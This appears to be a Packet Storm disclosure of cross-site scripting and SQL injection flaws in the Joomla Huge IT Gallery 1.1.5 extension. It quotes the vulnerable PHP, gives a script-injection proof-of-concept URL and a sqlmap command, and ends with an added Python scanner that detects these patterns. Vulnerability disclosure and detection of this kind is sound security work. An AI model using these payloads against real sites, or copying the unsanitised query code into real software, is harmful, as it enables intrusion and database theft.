Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection

Published: 24 Jul 2016 00:00:00  
Reported by: Larry W. Cashdollar  
Type: packetstorm  
Source: packetstormsecurity.com

XSS and SQLi vulnerabilities in Joomla Huge IT Gallery v1.1.

Related

- CNVD: Multiple vulnerabilities in the Huge-IT Image Gallery extension for Joomla! (28 Jul 2016 00:00)
- CVE: CVE-2016-1000113 (6 Oct 2016 14:00)
- Cvelist: CVE-2016-1000113 (6 Oct 2016 14:00)
- EUVD: EUVD-2016-1057 (7 Oct 2025 00:30)
- NVD: CVE-2016-1000113 (6 Oct 2016 14:59)
- Prion: Design/Logic Flaw (6 Oct 2016 14:59)

`Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla  
Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za   
Date: 2016-07-14  
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro  
Vendor: huge-it.com  
Vendor Notified: 2016-07-15, fixed v1.1.6  
Vendor Contact: [email protected]  
Advisory: http://www.vapidlabs.com/advisory.php?v=164  
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.  
Vulnerability:  
The attacker does not need to be logged in to Joomla to exploit this vulnerability:  
  
SQL injection in code via the id parameter:  
./administrator/components/com_gallery/models/gallery.php  
public function getPropertie() {  
$db = JFactory::getDBO();  
// 'id' is read from the request with no type filter or cast  
$id_cat = JRequest::getVar('id');  
$query = $db->getQuery(true);  
$query->select('#__huge_itgallery_images.name as name,'  
. '#__huge_itgallery_images.id ,'  
. '#__huge_itgallery_gallerys.name as portName,'  
. 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');  
$query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));  
// Vulnerable: $id_cat is concatenated into the WHERE clause unquoted and uncast  
$query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);  
$query->order('ordering desc');  
  
$db->setQuery($query);  
$results = $db->loadObjectList();  
return $results;  
}  
  
XSS is here:  
  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;  
./administrator/components/com_gallery/views/gallery/tmpl/default.php  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;  
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >  
CVE-2016-1000113  
Exploit Code:  
XSS PoC  
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
  
SQLi PoC  
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE  
  
http://192.168.0.125/index.php?option=com_gallery&id=HERE  
  
Video by 'Exploiter':  
https://www.youtube.com/watch?v=U67iQ3-xcho  
  
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql  
`
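
The advisory locates the XSS with a `find`/`grep` for `echo $_GET`. The added example below (not part of the advisory or of the extension's code) extends that audit into a small scanner that also flags the SQL injection pattern: a request value assigned to a variable and later concatenated into a query-builder call. The sample inputs are constructed from the lines quoted above; the `(int)` casts in the hardened sample are an illustrative assumption, not the vendor's 1.1.6 fix, and the line-level "safe" check is a heuristic.

```python
import re

# Request sources seen in the advisory: JRequest::getVar() and raw superglobals.
SOURCE = r"(?:JRequest::getVar\s*\(|\$_(?:GET|POST|REQUEST)\s*\[)"
ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + SOURCE)           # $var = <request value>
ECHO = re.compile(r"echo\s+\$_(?:GET|POST|REQUEST)\s*\[")  # echo $_GET[...] directly
SINK = re.compile(r"->(?:where|having|order|setQuery)\s*\(")
# Heuristic: a cast or quoting call on the sink line is treated as sanitising.
SAFE = re.compile(r"\(int\)|intval\s*\(|->quote\s*\(|->escape\s*\(", re.I)


def scan(php_source):
    """Return (line_no, kind, detail) findings for the text of one PHP file."""
    findings, tainted = [], set()
    for no, line in enumerate(php_source.splitlines(), 1):
        if ECHO.search(line):
            findings.append((no, "xss", "request value echoed without escaping"))
        m = ASSIGN.search(line)
        if m:
            tainted.add(m.group(1))  # remember variables holding raw request data
        if SINK.search(line) and not SAFE.search(line):
            for var in sorted(tainted):
                if re.search(re.escape(var) + r"\b", line):
                    findings.append((no, "sqli", var + " reaches query unsanitised"))
    return findings


# Constructed sample: the vulnerable lines quoted in the advisory.
VULNERABLE = r"""
$id_cat = JRequest::getVar('id');
$query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
<a class="modal" href="index.php?option=com_gallery&view=video&pid=<?php echo $_GET['id']; ?>">
""".strip()

# Constructed sample: same lines with integer casts (assumed fix, not the vendor's).
HARDENED = r"""
$id_cat = JRequest::getVar('id');
$query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . (int) $id_cat);
<a class="modal" href="index.php?option=com_gallery&view=video&pid=<?php echo (int) $_GET['id']; ?>">
""".strip()

if __name__ == "__main__":
    for name, sample in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(name, scan(sample))
```
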
